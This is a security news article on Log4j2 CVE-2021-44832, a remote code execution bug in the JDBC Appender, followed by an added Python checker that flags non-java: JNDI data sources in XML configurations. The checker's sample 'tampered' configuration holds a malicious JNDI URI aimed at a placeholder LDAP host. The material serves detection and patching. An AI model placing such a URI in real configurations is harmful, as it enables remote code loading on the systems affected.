The Apache Software Foundation has released a new security update to address another Log4j vulnerability (CVE-2021-44832), in which Log4j2 is vulnerable to remote code execution (RCE) via the JDBC Appender when an attacker controls the logging configuration file.
“Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2,” Apache stated in the new advisory published Tuesday.
Apache provided additional details on the issue in the LOG4J2-3293 issue tracker entry. CVE-2021-44832 is rated Moderate severity with a CVSS base score of 6.6. No active exploitation in the wild was known at the time of the original advisory.
This recent flaw is not as severe as the Log4Shell RCE vulnerability (CVE-2021-44228) or CVE-2021-45046, since an attacker would need local privileges on the target system in order to gain access to the configuration file.
However, threat actors could abuse this vulnerability in post-exploitation activities, where they already hold that access.
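As an added defensive example (this code is not from the article, from Apache, or from the Log4j project): a small Python checker that parses a Log4j2 XML configuration and flags any JDBC appender whose DataSource `jndiName` does not use the `java:` scheme, the criterion the advisory gives for the fix in 2.17.1. The two sample configurations and the `.invalid` hostname are constructed for illustration; the checker covers XML configurations only (JSON, YAML and properties formats are not parsed), and it treats a JNDI name with no scheme at all as a lower-severity item to review rather than silently accepting it.

```python
"""Flag JDBC appenders in a Log4j2 XML configuration whose DataSource
JNDI name does not use the "java:" scheme (the CVE-2021-44832 pattern).
Added example, not part of the original article or of Log4j itself."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample configuration (not taken from the advisory).
SAFE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <JDBC name="dbLog" tableName="application_log">
      <DataSource jndiName="java:comp/env/jdbc/LoggingDataSource"/>
      <Column name="eventDate" isEventTimestamp="true"/>
      <Column name="message" pattern="%message"/>
    </JDBC>
    <Console name="stdout">
      <PatternLayout pattern="%m%n"/>
    </Console>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="dbLog"/></Root>
  </Loggers>
</Configuration>
"""

# Same layout, but the DataSource now points at a remote JNDI URI.
# The hostname is a constructed ".invalid" placeholder.
TAMPERED_CONFIG = SAFE_CONFIG.replace(
    'jndiName="java:comp/env/jdbc/LoggingDataSource"',
    'jndiName="ldap://jndi-host.invalid:1389/ref"',
)


@dataclass
class Finding:
    appender: str
    jndi_name: str
    severity: str  # "high" = non-java scheme, "review" = no scheme at all


def jndi_scheme(name: str) -> str:
    """Return the lower-cased scheme of a JNDI name ('' if it has none)."""
    head, sep, _ = name.partition(":")
    return head.strip().lower() if sep else ""


def is_jdbc_appender(elem: ET.Element) -> bool:
    """Log4j2 accepts <JDBC ...> and the strict form <Appender type="JDBC" ...>."""
    return elem.tag == "JDBC" or (elem.tag == "Appender" and elem.get("type") == "JDBC")


def scan_config(xml_text: str) -> list[Finding]:
    """Walk every JDBC appender and report DataSources not restricted to java:."""
    root = ET.fromstring(xml_text)
    findings: list[Finding] = []
    for appender in root.iter():
        if not is_jdbc_appender(appender):
            continue
        name = appender.get("name", "<unnamed>")
        for ds in appender.iter("DataSource"):
            jndi = ds.get("jndiName", "")
            scheme = jndi_scheme(jndi)
            if scheme == "java":
                continue  # the only scheme the fixed releases permit
            severity = "high" if scheme else "review"
            findings.append(Finding(name, jndi, severity))
    return findings


if __name__ == "__main__":
    for label, cfg in (("safe", SAFE_CONFIG), ("tampered", TAMPERED_CONFIG)):
        hits = scan_config(cfg)
        print(f"{label}: {len(hits)} finding(s)")
        for hit in hits:
            print(f"  [{hit.severity}] appender {hit.appender!r} -> {hit.jndi_name}")
```

Running the checker over a fleet's `log4j2.xml` files is a cheap way to confirm no configuration already references a non-`java:` data source before or after upgrading; since this bug requires write access to the configuration, a finding here is also a useful signal that something modified a file that should not change.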